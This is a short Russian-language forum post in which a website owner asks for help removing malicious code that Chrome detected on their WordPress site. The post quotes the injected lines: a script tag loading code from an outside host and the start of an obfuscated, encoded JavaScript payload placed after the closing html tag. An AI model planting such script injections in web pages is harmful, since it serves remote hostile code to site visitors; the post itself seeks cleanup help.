Google Chrome приветствовал меня обнаружением вредоносного кода. Мне удалось отследить код в исходном коде (firebug), но я не знаю, как найти сценарии .js, в которых находятся коды. Он состоит из 2-х скриптов:
<script src="http://12nwsp.serveirc.com//ml.php" type="text/javascript"> </script>
<script type="text/javascript">var bWUW1aIO9J="YEXI018YEXI035";var fGdfWY1etv0="YEXI03cYEXI073YEXI063YEXI07";
и многое другое в этом.
Эти javascript-коды расположены внизу страницы после закрывающего </html>
.
Забавная вещь ... Как только я создал другой поддомен на своем хосте, установил Wordpress и сделал некоторые вещи, точно такой же 12nwsp.serveirc.com вернулся.
Теперь я искал и искал, и пришел к выводу, что он вполне может быть создан с помощью iframes (и они у меня есть).
Если вы хотите посмотреть и помочь мне, это http://test.donm.nl/vanderwal (это своего рода онлайн-каталог).
Мне просто интересно, есть ли какой-нибудь инструмент или что-то, что может сказать мне, где находятся эти надоедливые скрипты Bugger, чтобы я мог их удалить.
Ty